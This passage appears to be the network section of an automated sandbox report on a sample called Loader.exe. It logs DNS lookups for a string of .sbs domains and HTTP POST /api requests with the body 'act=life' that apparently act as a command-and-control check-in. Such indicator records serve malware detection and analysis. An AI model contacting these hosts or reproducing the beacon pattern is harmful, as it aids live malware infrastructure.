                                                                                                                    Oct 12, 2024 22:36:12.663331985 CEST44349755172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.663770914 CEST44349755172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.664815903 CEST49755443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:12.664843082 CEST49755443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:12.664901972 CEST44349755172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.787341118 CEST44349755172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.787478924 CEST44349755172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.787539959 CEST44349755172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.787636995 CEST49755443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:12.787662983 CEST44349755172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.787893057 CEST49755443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:12.792252064 CEST44349755172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.792443991 CEST44349755172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.792505980 CEST49755443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:12.792562962 CEST49755443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:12.792578936 CEST44349755172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.792594910 CEST49755443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:12.792599916 CEST44349755172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.838994980 CEST49761443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:12.839051962 CEST44349761172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.839131117 CEST49761443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:12.839459896 CEST49761443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:12.839478970 CEST44349761172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:13.334232092 CEST44349761172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:13.334311962 CEST49761443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:13.335289955 CEST49761443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:13.335304022 CEST44349761172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:13.335514069 CEST44349761172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:13.337016106 CEST49761443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:13.337054968 CEST49761443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:13.337073088 CEST44349761172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:13.768270016 CEST44349761172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:13.768371105 CEST44349761172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:13.768505096 CEST49761443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:13.770653963 CEST49761443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:13.770678997 CEST44349761172.67.206.204192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:13.770716906 CEST49761443192.168.2.6172.67.206.204
                                                                                                                    Oct 12, 2024 22:36:13.770725012 CEST44349761172.67.206.204192.168.2.6
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Oct 12, 2024 22:36:02.740997076 CEST5598853192.168.2.61.1.1.1
                                                                                                                    Oct 12, 2024 22:36:02.757307053 CEST53559881.1.1.1192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:03.762048006 CEST6449353192.168.2.61.1.1.1
                                                                                                                    Oct 12, 2024 22:36:03.775693893 CEST53644931.1.1.1192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:04.698407888 CEST5378653192.168.2.61.1.1.1
                                                                                                                    Oct 12, 2024 22:36:04.708112955 CEST53537861.1.1.1192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:04.758724928 CEST5038153192.168.2.61.1.1.1
                                                                                                                    Oct 12, 2024 22:36:04.772324085 CEST53503811.1.1.1192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:05.716569901 CEST5022253192.168.2.61.1.1.1
                                                                                                                    Oct 12, 2024 22:36:05.735029936 CEST53502221.1.1.1192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:06.687782049 CEST5184353192.168.2.61.1.1.1
                                                                                                                    Oct 12, 2024 22:36:06.700640917 CEST53518431.1.1.1192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:07.803850889 CEST6314953192.168.2.61.1.1.1
                                                                                                                    Oct 12, 2024 22:36:07.820810080 CEST53631491.1.1.1192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:08.748837948 CEST5835453192.168.2.61.1.1.1
                                                                                                                    Oct 12, 2024 22:36:08.765737057 CEST53583541.1.1.1192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:09.689166069 CEST5013553192.168.2.61.1.1.1
                                                                                                                    Oct 12, 2024 22:36:09.699343920 CEST53501351.1.1.1192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:10.667393923 CEST6462753192.168.2.61.1.1.1
                                                                                                                    Oct 12, 2024 22:36:10.674513102 CEST53646271.1.1.1192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:12.166202068 CEST5877453192.168.2.61.1.1.1
                                                                                                                    Oct 12, 2024 22:36:12.175319910 CEST53587741.1.1.1192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:19.809146881 CEST53601961.1.1.1192.168.2.6
                                                                                                                    Oct 12, 2024 22:36:21.484205961 CEST53530111.1.1.1192.168.2.6
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Oct 12, 2024 22:36:02.740997076 CEST192.168.2.61.1.1.10x4233Standard query (0)widdensmoywi.sbsA (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:03.762048006 CEST192.168.2.61.1.1.10x5a0Standard query (0)mathcucom.sbsA (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:04.698407888 CEST192.168.2.61.1.1.10xd91fStandard query (0)allocatinow.sbsA (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:04.758724928 CEST192.168.2.61.1.1.10x9c26Standard query (0)enlargkiw.sbsA (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:05.716569901 CEST192.168.2.61.1.1.10x3c8dStandard query (0)resinedyw.sbsA (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:06.687782049 CEST192.168.2.61.1.1.10x86c4Standard query (0)vennurviot.sbsA (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:07.803850889 CEST192.168.2.61.1.1.10xb641Standard query (0)ehticsprocw.sbsA (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:08.748837948 CEST192.168.2.61.1.1.10x4458Standard query (0)condifendteu.sbsA (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:09.689166069 CEST192.168.2.61.1.1.10x6ed9Standard query (0)drawwyobstacw.sbsA (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:10.667393923 CEST192.168.2.61.1.1.10x799aStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:12.166202068 CEST192.168.2.61.1.1.10xcff2Standard query (0)sergei-esenin.comA (IP address)IN (0x0001)false
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Oct 12, 2024 22:36:02.757307053 CEST1.1.1.1192.168.2.60x4233No error (0)widdensmoywi.sbs104.21.8.37A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:02.757307053 CEST1.1.1.1192.168.2.60x4233No error (0)widdensmoywi.sbs172.67.156.197A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:03.775693893 CEST1.1.1.1192.168.2.60x5a0No error (0)mathcucom.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:03.775693893 CEST1.1.1.1192.168.2.60x5a0No error (0)mathcucom.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:04.708112955 CEST1.1.1.1192.168.2.60xd91fName error (3)allocatinow.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:04.772324085 CEST1.1.1.1192.168.2.60x9c26No error (0)enlargkiw.sbs104.21.33.249A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:04.772324085 CEST1.1.1.1192.168.2.60x9c26No error (0)enlargkiw.sbs172.67.152.13A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:05.735029936 CEST1.1.1.1192.168.2.60x3c8dNo error (0)resinedyw.sbs172.67.205.156A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:05.735029936 CEST1.1.1.1192.168.2.60x3c8dNo error (0)resinedyw.sbs104.21.77.78A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:06.700640917 CEST1.1.1.1192.168.2.60x86c4No error (0)vennurviot.sbs172.67.140.193A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:06.700640917 CEST1.1.1.1192.168.2.60x86c4No error (0)vennurviot.sbs104.21.46.170A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:07.820810080 CEST1.1.1.1192.168.2.60xb641No error (0)ehticsprocw.sbs172.67.173.224A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:07.820810080 CEST1.1.1.1192.168.2.60xb641No error (0)ehticsprocw.sbs104.21.30.221A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:08.765737057 CEST1.1.1.1192.168.2.60x4458No error (0)condifendteu.sbs104.21.79.35A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:08.765737057 CEST1.1.1.1192.168.2.60x4458No error (0)condifendteu.sbs172.67.141.136A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:09.699343920 CEST1.1.1.1192.168.2.60x6ed9No error (0)drawwyobstacw.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:09.699343920 CEST1.1.1.1192.168.2.60x6ed9No error (0)drawwyobstacw.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:10.674513102 CEST1.1.1.1192.168.2.60x799aNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:12.175319910 CEST1.1.1.1192.168.2.60xcff2No error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                                                                                    Oct 12, 2024 22:36:12.175319910 CEST1.1.1.1192.168.2.60xcff2No error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false
                                                                                                                    • widdensmoywi.sbs
                                                                                                                    • mathcucom.sbs
                                                                                                                    • enlargkiw.sbs
                                                                                                                    • resinedyw.sbs
                                                                                                                    • vennurviot.sbs
                                                                                                                    • ehticsprocw.sbs
                                                                                                                    • condifendteu.sbs
                                                                                                                    • drawwyobstacw.sbs
                                                                                                                    • steamcommunity.com
                                                                                                                    • sergei-esenin.com
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.649710104.21.8.374435200C:\Users\user\Desktop\Loader.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-10-12 20:36:03 UTC263OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 8
                                                                                                                    Host: widdensmoywi.sbs
                                                                                                                    2024-10-12 20:36:03 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                    Data Ascii: act=life
                                                                                                                    2024-10-12 20:36:03 UTC819INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 12 Oct 2024 20:36:03 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=hdut29ik8bfbdefh98eb2b35dq; expires=Wed, 05 Feb 2025 14:22:42 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b06avIzXd3Ww3gt3Y8%2BQf0Gt6Z4phsIRUFwrv73hoj37KNb7ZVd0YtTlPQhOPODE3%2BVDeTtvsTXKT5hKh4szoLrhVV4Pg2SOhahgpKCOjPo4XyJVXCk9LzcYXV9SPRmPu%2BOu"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d19e1413bf45e70-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    2024-10-12 20:36:03 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                    Data Ascii: aerror #D12
                                                                                                                    2024-10-12 20:36:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.649713188.114.96.34435200C:\Users\user\Desktop\Loader.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-10-12 20:36:04 UTC260OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 8
                                                                                                                    Host: mathcucom.sbs
                                                                                                                    2024-10-12 20:36:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                    Data Ascii: act=life
                                                                                                                    2024-10-12 20:36:04 UTC813INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 12 Oct 2024 20:36:04 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=eeas88ulsiudm1bq7oeca8o3s0; expires=Wed, 05 Feb 2025 14:22:43 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DTZFwGZVFfkJnMAnYZ4eBSlLZT9ti6uoGjlX%2ByKOV6240udsJNSud3m9CLgNzkFqiKNcZbQT%2BRUJvT3XLh8mTUvobYr28wxcUDXlpxLir8g7lGjAFPBg458VNzb7m1d2"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d19e1472bd642bb-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    2024-10-12 20:36:04 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                    Data Ascii: aerror #D12
                                                                                                                    2024-10-12 20:36:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.649715104.21.33.2494435200C:\Users\user\Desktop\Loader.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-10-12 20:36:05 UTC260OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 8
                                                                                                                    Host: enlargkiw.sbs
                                                                                                                    2024-10-12 20:36:05 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                    Data Ascii: act=life
                                                                                                                    2024-10-12 20:36:05 UTC815INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 12 Oct 2024 20:36:05 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=s484toj1lupdqa0fj8imr48cao; expires=Wed, 05 Feb 2025 14:22:44 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RRmp04bXJKwPUpVuymtqV756B5UOrGSBdenyAavWc310BurAbeWjZH2J8IPjp%2BpibA8sy0RVtY1mBQv19v870itxvzDxOl0EwhCfa7EfRLaQM0xUBTY%2BCG3MlBh%2FeEJ2"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d19e14d6fb54239-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    2024-10-12 20:36:05 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                    Data Ascii: aerror #D12
                                                                                                                    2024-10-12 20:36:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.649718172.67.205.1564435200C:\Users\user\Desktop\Loader.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-10-12 20:36:06 UTC260OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 8
                                                                                                                    Host: resinedyw.sbs
                                                                                                                    2024-10-12 20:36:06 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                    Data Ascii: act=life
                                                                                                                    2024-10-12 20:36:06 UTC811INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 12 Oct 2024 20:36:06 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=29hhisojo58794akfo3u5h9mnq; expires=Wed, 05 Feb 2025 14:22:45 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mGgTHS18HVoL1ONg01udwWJWsh9eNJaEq3TaQmL1irkxmByY0zqTfDfbrQTdimOKVSHYpS4hDcyI1C8%2BAC8sKit3rG3wHix99MfbUSeFhSmvIUKk1eds3kq2NG1Elkj3"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d19e1535f50421c-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    2024-10-12 20:36:06 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                    Data Ascii: aerror #D12
                                                                                                                    2024-10-12 20:36:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.649720172.67.140.1934435200C:\Users\user\Desktop\Loader.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-10-12 20:36:07 UTC261OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 8
                                                                                                                    Host: vennurviot.sbs
                                                                                                                    2024-10-12 20:36:07 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                    Data Ascii: act=life
                                                                                                                    2024-10-12 20:36:07 UTC821INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 12 Oct 2024 20:36:07 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=cii25l5c41jal3qa9gg6qhu2aa; expires=Wed, 05 Feb 2025 14:22:46 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tiYcdeNydOKI1YEiJbtWBbpqmYqHLsLm7%2Fk9EEHnmdg6HUoxvBP8U9Z%2FpFxWQD61GvHUccWvBihrzSi2JSAwVYNS4wpfwEaBfmqalBD07KnjeojV6sqnhpgNAMij7KmXwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d19e1596d750f47-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    2024-10-12 20:36:07 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                    Data Ascii: aerror #D12
                                                                                                                    2024-10-12 20:36:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.649721172.67.173.2244435200C:\Users\user\Desktop\Loader.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-10-12 20:36:08 UTC262OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 8
                                                                                                                    Host: ehticsprocw.sbs
                                                                                                                    2024-10-12 20:36:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                    Data Ascii: act=life
                                                                                                                    2024-10-12 20:36:08 UTC821INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 12 Oct 2024 20:36:08 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=av1djgm2qa728pc40tuvrn06q1; expires=Wed, 05 Feb 2025 14:22:47 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=29Pcx2Sz5oK6NsRh2EFCm4tD1vTXVw36TmhX%2BuWOnpbf%2FAniYl6Aa3vvSbPhLmJv6tZX%2B2jmXZIzuD6Q0vhyOaFkuNsA3fgiHuLpWyag45UNKL9rir0DLOdrK1KULFG25Ow%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d19e1605ddb7d00-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    2024-10-12 20:36:08 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                    Data Ascii: aerror #D12
                                                                                                                    2024-10-12 20:36:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.649732104.21.79.354435200C:\Users\user\Desktop\Loader.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-10-12 20:36:09 UTC263OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 8
                                                                                                                    Host: condifendteu.sbs
                                                                                                                    2024-10-12 20:36:09 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                    Data Ascii: act=life
                                                                                                                    2024-10-12 20:36:09 UTC823INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 12 Oct 2024 20:36:09 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=686o0uv57irhr2n8nv8fc1qjtc; expires=Wed, 05 Feb 2025 14:22:48 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MY9WdvHGsQ%2FTdcZCs1BB49KQTAyYPNQnvhnjgJ3UUphjdukiqcdm7X4DQ5nW8TEv6wMFdkXzq%2F%2BqCk%2FyxzJbvUDTkbeJKi9SW9au%2Br8cyaUaA8nRANiEs8g55CfQx5upHHlj"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d19e1663a0543fd-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    2024-10-12 20:36:09 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                    Data Ascii: aerror #D12
                                                                                                                    2024-10-12 20:36:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.649738188.114.96.34435200C:\Users\user\Desktop\Loader.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-10-12 20:36:10 UTC264OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 8
                                                                                                                    Host: drawwyobstacw.sbs
                                                                                                                    2024-10-12 20:36:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                    Data Ascii: act=life
                                                                                                                    2024-10-12 20:36:10 UTC821INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 12 Oct 2024 20:36:10 GMT
